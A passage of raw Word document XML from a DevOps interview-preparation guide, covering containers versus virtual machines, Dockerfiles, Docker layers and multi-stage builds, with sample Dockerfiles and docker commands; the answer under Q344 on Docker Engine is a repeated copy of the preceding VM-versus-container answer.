        <w:t xml:space="preserve">               * Consistency: Same behavior across environments.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Isolation: Applications don’t interfere with each other.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Efficiency: Uses fewer resources than VMs.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Scalability: Easy to replicate and scale containers.</w:t>
        <w:br/>
        <w:t>Container vs Virtual Machine</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Virtual Machine</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Shares host OS kernel</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Has its own OS</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lightweight</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Heavyweight</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Starts in seconds</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Starts in minutes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low resource usage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher resource usage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>A Python web application can be containerized with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Python runtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Required packages</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Application code</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Configuration</w:t>
        <w:br/>
        <w:t>The resulting container can run identically on:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Developer laptop</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Test environment</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Production server</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cloud platform</w:t>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Containerization is the process of packaging an application and all its dependencies into an isolated container, ensuring consistent execution across development, testing, and production environments. Containers share the host OS kernel, making them lightweight and efficient compared to virtual machines. Tools like Docker are commonly used for containerization, while Kubernetes is used to orchestrate and manage containers at scale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q343. Difference between VM and container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: VM vs Container</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Virtual Machine (VM)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Architecture</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runs on a Hypervisor</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runs on a Container Runtime (Docker/containerd)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Operating System</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Each VM has its own Guest OS</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Shares Host OS Kernel</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Size</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Large (GBs)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Small (MBs)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Startup Time</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Minutes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Seconds</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Resource Usage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Performance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>More overhead</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Near-native performance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stronger isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Process-level isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Portability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Less portable</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Highly portable</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Density</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Fewer VMs per host</w:t>
        <w:br/>
        <w:tab/>
        <w:t>More containers per host</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use Case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Running multiple OS types, legacy apps</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Microservices, cloud-native apps</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Architecture</w:t>
        <w:br/>
        <w:t>Virtual Machine</w:t>
        <w:br/>
        <w:t>Application</w:t>
        <w:br/>
        <w:t>Guest OS</w:t>
        <w:br/>
        <w:t>Virtual Hardware</w:t>
        <w:br/>
        <w:t>Hypervisor</w:t>
        <w:br/>
        <w:t>Host OS</w:t>
        <w:br/>
        <w:t>Physical Server</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t>Application</w:t>
        <w:br/>
        <w:t>Libraries &amp; Dependencies</w:t>
        <w:br/>
        <w:t>Container Runtime (Docker/containerd)</w:t>
        <w:br/>
        <w:t>Host OS</w:t>
        <w:br/>
        <w:t>Physical Server</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Suppose you have 10 Java applications:</w:t>
        <w:br/>
        <w:t>Using VMs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * 10 VMs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * 10 Guest OS installations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Higher RAM and CPU consumption</w:t>
        <w:br/>
        <w:t>Using Containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * 10 Containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Shared Host OS kernel</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Lower resource consumption</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster startup</w:t>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>A Virtual Machine virtualizes the entire hardware stack and includes a separate guest operating system, making it heavier but providing stronger isolation. A container virtualizes at the operating system level and shares the host OS kernel, making it lightweight, faster to start, and more resource-efficient. In modern cloud-native environments, containers are preferred for microservices and Kubernetes workloads, while VMs are typically used when complete OS isolation or different operating systems are required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q344. What is Docker Engine?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: VM vs Container</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Virtual Machine (VM)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Architecture</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runs on a Hypervisor</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runs on a Container Runtime (Docker/containerd)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Operating System</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Each VM has its own Guest OS</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Shares Host OS Kernel</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Size</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Large (GBs)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Small (MBs)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Startup Time</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Minutes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Seconds</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Resource Usage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Performance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>More overhead</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Near-native performance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stronger isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Process-level isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Portability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Less portable</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Highly portable</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Density</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Fewer VMs per host</w:t>
        <w:br/>
        <w:tab/>
        <w:t>More containers per host</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use Case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Running multiple OS types, legacy apps</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Microservices, cloud-native apps</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Architecture</w:t>
        <w:br/>
        <w:t>Virtual Machine</w:t>
        <w:br/>
        <w:t>Application</w:t>
        <w:br/>
        <w:t>Guest OS</w:t>
        <w:br/>
        <w:t>Virtual Hardware</w:t>
        <w:br/>
        <w:t>Hypervisor</w:t>
        <w:br/>
        <w:t>Host OS</w:t>
        <w:br/>
        <w:t>Physical Server</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t>Application</w:t>
        <w:br/>
        <w:t>Libraries &amp; Dependencies</w:t>
        <w:br/>
        <w:t>Container Runtime (Docker/containerd)</w:t>
        <w:br/>
        <w:t>Host OS</w:t>
        <w:br/>
        <w:t>Physical Server</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Suppose you have 10 Java applications:</w:t>
        <w:br/>
        <w:t>Using VMs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * 10 VMs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * 10 Guest OS installations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Higher RAM and CPU consumption</w:t>
        <w:br/>
        <w:t>Using Containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * 10 Containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Shared Host OS kernel</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Lower resource consumption</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster startup</w:t>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>A Virtual Machine virtualizes the entire hardware stack and includes a separate guest operating system, making it heavier but providing stronger isolation. A container virtualizes at the operating system level and shares the host OS kernel, making it lightweight, faster to start, and more resource-efficient. In modern cloud-native environments, containers are preferred for microservices and Kubernetes workloads, while VMs are typically used when complete OS isolation or different operating systems are required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q345. What is Dockerfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is a Dockerfile?</w:t>
        <w:br/>
        <w:t>A Dockerfile is a text file that contains a set of instructions used to automatically build a Docker image.</w:t>
        <w:br/>
        <w:t>It defines:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Base image</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Application code</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Dependencies</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Environment variables</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Startup commands</w:t>
        <w:br/>
        <w:t>Using a Dockerfile ensures consistent and repeatable image creation.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Dockerfile</w:t>
        <w:br/>
        <w:t>FROM python:3.12</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>WORKDIR /app</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY requirements.txt .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>RUN pip install -r requirements.txt</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>EXPOSE 5000</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CMD ["python", "app.py"]</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Dockerfile Instructions</w:t>
        <w:br/>
        <w:t>Instruction</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>FROM</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Specifies the base image</w:t>
        <w:br/>
        <w:tab/>
        <w:t>WORKDIR</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Sets the working directory</w:t>
        <w:br/>
        <w:tab/>
        <w:t>COPY</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Copies files from host to image</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ADD</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Copies files and supports URLs/tar extraction</w:t>
        <w:br/>
        <w:tab/>
        <w:t>RUN</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Executes commands during image build</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ENV</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Sets environment variables</w:t>
        <w:br/>
        <w:tab/>
        <w:t>EXPOSE</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Documents the port the container uses</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CMD</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Default command when container starts</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ENTRYPOINT</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Main executable for the container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>USER</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Specifies the user to run commands</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ARG</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Build-time variables</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Image Build Process</w:t>
        <w:br/>
        <w:t>Dockerfile</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>docker build</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ▼</w:t>
        <w:br/>
        <w:t>Docker Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>docker run</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ▼</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Build Command</w:t>
        <w:br/>
        <w:t>docker build -t my-python-app:v1 .</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * -t → Tag the image</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * . → Current directory containing the Dockerfile</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CMD vs ENTRYPOINT</w:t>
        <w:br/>
        <w:t>CMD</w:t>
        <w:br/>
        <w:t>CMD ["python", "app.py"]</w:t>
        <w:br/>
        <w:t>Can be overridden:</w:t>
        <w:br/>
        <w:t>docker run image_name python test.py</w:t>
        <w:br/>
        <w:t>ENTRYPOINT</w:t>
        <w:br/>
        <w:t>ENTRYPOINT ["python"]</w:t>
        <w:br/>
        <w:t>CMD ["app.py"]</w:t>
        <w:br/>
        <w:t>Produces:</w:t>
        <w:br/>
        <w:t>python app.py</w:t>
        <w:br/>
        <w:t>If overridden:</w:t>
        <w:br/>
        <w:t>docker run image_name test.py</w:t>
        <w:br/>
        <w:t>Produces:</w:t>
        <w:br/>
        <w:t>python test.py</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Dockerfile Best Practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Use lightweight base images (Alpine, Distroless).</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Minimize the number of layers.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Use .dockerignore.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Run containers as a non-root user.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pin image versions instead of using latest.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Leverage layer caching by copying dependency files first.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>COPY requirements.txt .</w:t>
        <w:br/>
        <w:t>RUN pip install -r requirements.txt</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>A Dockerfile is a declarative text file that contains instructions for building a Docker image. It defines the base image, application dependencies, configurations, and startup commands. Docker uses the Dockerfile during the docker build process to create immutable and reproducible images. Common instructions include FROM, COPY, RUN, ENV, CMD, and ENTRYPOINT. Following Dockerfile best practices such as using minimal base images, optimizing layer caching, and avoiding root users helps create secure and efficient container images.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q346. Explain Docker layers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Docker Layers</w:t>
        <w:br/>
        <w:t>Docker images are built using a series of read-only layers. Each instruction in a Dockerfile creates a new layer, and these layers are stacked on top of each other to form the final image.</w:t>
        <w:br/>
        <w:t>How Layers Work</w:t>
        <w:br/>
        <w:t>Consider this Dockerfile:</w:t>
        <w:br/>
        <w:t>FROM ubuntu:22.04</w:t>
        <w:br/>
        <w:t>RUN apt-get update</w:t>
        <w:br/>
        <w:t>RUN apt-get install -y nginx</w:t>
        <w:br/>
        <w:t>COPY index.html /usr/share/nginx/html/</w:t>
        <w:br/>
        <w:t>CMD ["nginx", "-g", "daemon off;"]</w:t>
        <w:br/>
        <w:t>Generated layers:</w:t>
        <w:br/>
        <w:t>Layer 5 : COPY index.html</w:t>
        <w:br/>
        <w:t>Layer 4 : RUN apt-get install nginx</w:t>
        <w:br/>
        <w:t>Layer 3 : RUN apt-get update</w:t>
        <w:br/>
        <w:t>Layer 2 : Ubuntu Base OS</w:t>
        <w:br/>
        <w:t>Layer 1 : Bootstrapped Filesystem</w:t>
        <w:br/>
        <w:t>When a container starts, Docker adds a thin writable layer on top of these read-only image layers.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Copy-on-Write (CoW)</w:t>
        <w:br/>
        <w:t>Containers share image layers.</w:t>
        <w:br/>
        <w:t>Base Image Layers</w:t>
        <w:br/>
        <w:t xml:space="preserve">       │</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ┌─────┴─────┐</w:t>
        <w:br/>
        <w:t xml:space="preserve"> │           │</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ▼           ▼</w:t>
        <w:br/>
        <w:t>Container1  Container2</w:t>
        <w:br/>
        <w:t>Writable    Writable</w:t>
        <w:br/>
        <w:t>Layer       Layer</w:t>
        <w:br/>
        <w:t>If a file is modified:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Original image layer remains unchanged.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Changes are written only to the container’s writable layer.</w:t>
        <w:br/>
        <w:t>This is called Copy-on-Write.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits of Layers</w:t>
        <w:br/>
        <w:t>1. Faster Builds</w:t>
        <w:br/>
        <w:t>Docker reuses unchanged layers from cache.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>COPY requirements.txt .</w:t>
        <w:br/>
        <w:t>RUN pip install -r requirements.txt</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:t>If only application code changes, Docker reuses the dependency installation layer.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Reduced Storage</w:t>
        <w:br/>
        <w:t>Multiple images can share common layers.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Image A</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├─ Ubuntu Layer</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├─ Python Layer</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ App A Layer</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Image B</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├─ Ubuntu Layer</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├─ Python Layer</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ App B Layer</w:t>
        <w:br/>
        <w:t>Ubuntu and Python layers are stored only once.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Faster Image Distribution</w:t>
        <w:br/>
        <w:t>When pushing or pulling images, only missing layers are transferred.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Viewing Layers</w:t>
        <w:br/>
        <w:t>Show image history:</w:t>
        <w:br/>
        <w:t>docker history nginx</w:t>
        <w:br/>
        <w:t>Inspect image details:</w:t>
        <w:br/>
        <w:t>docker image inspect nginx</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Layer Caching Example</w:t>
        <w:br/>
        <w:t>Bad:</w:t>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:t>RUN npm install</w:t>
        <w:br/>
        <w:t>Any code change invalidates the cache.</w:t>
        <w:br/>
        <w:t>Good:</w:t>
        <w:br/>
        <w:t>COPY package.json .</w:t>
        <w:br/>
        <w:t>RUN npm install</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:t>Dependencies are reused if package.json hasn’t changed.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Image Layers vs Container Layer</w:t>
        <w:br/>
        <w:t>Image Layers</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Container Layer</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Read-only</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Read-write</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Shared across containers</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Unique per container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Created during build</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Created at runtime</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Immutable</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Temporary</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Docker images are composed of multiple immutable, read-only layers. Each Dockerfile instruction such as FROM, RUN, or COPY creates a new layer. Docker uses a union filesystem to stack these layers into a single image. When a container starts, Docker adds a writable layer on top of the image layers using a copy-on-write mechanism. This layered architecture improves storage efficiency, accelerates image builds through caching, and reduces network transfer during image distribution. For optimal performance, Dockerfiles should be structured to maximize layer cache reuse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q347. What is multi-stage build?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is a Multi-Stage Build?</w:t>
        <w:br/>
        <w:t>A multi-stage build is a Docker feature that allows you to use multiple FROM statements in a single Dockerfile. It helps create smaller, more secure, and optimized Docker images by separating the build environment from the runtime environment.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Use Multi-Stage Builds?</w:t>
        <w:br/>
        <w:t>Without multi-stage builds:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Build tools (Maven, Gradle, GCC, Node.js, etc.) remain in the final image.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Image size becomes large.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * More security vulnerabilities due to unnecessary packages.</w:t>
        <w:br/>
        <w:t>With multi-stage builds:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Build artifacts are created in one stage.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Only the required artifacts are copied to the final image.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Build dependencies are excluded from production images.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example: Go Application</w:t>
        <w:br/>
        <w:t># Build Stage</w:t>
        <w:br/>
        <w:t>FROM golang:1.24 AS builder</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>WORKDIR /app</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>RUN go build -o myapp</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t># Runtime Stage</w:t>
        <w:br/>
        <w:t>FROM alpine:latest</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>WORKDIR /app</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY --from=builder /app/myapp .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CMD ["./myapp"]</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Build Process</w:t>
        <w:br/>
        <w:t>Stage 1 (Builder)</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├─ Go SDK</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├─ Source Code</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ Build Binary</w:t>
        <w:br/>
        <w:t xml:space="preserve">        │</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ▼</w:t>
        <w:br/>
        <w:t>COPY --from=builder</w:t>
        <w:br/>
        <w:t xml:space="preserve">        │</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ▼</w:t>
        <w:br/>
        <w:t>Stage 2 (Runtime)</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ Binary Only</w:t>
        <w:br/>
        <w:t>Final image contains only:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Compiled binary</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Minimal runtime libraries</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example: Java Maven Application</w:t>
        <w:br/>
        <w:t># Build Stage</w:t>
        <w:br/>
        <w:t>FROM maven:3.9-eclipse-temurin-21 AS builder</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>WORKDIR /app</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>RUN mvn clean package</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t># Runtime Stage</w:t>
        <w:br/>
        <w:t>FROM eclipse-temurin:21-jre</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY --from=builder /app/target/app.jar app.jar</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>ENTRYPOINT ["java","-jar","app.jar"]</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
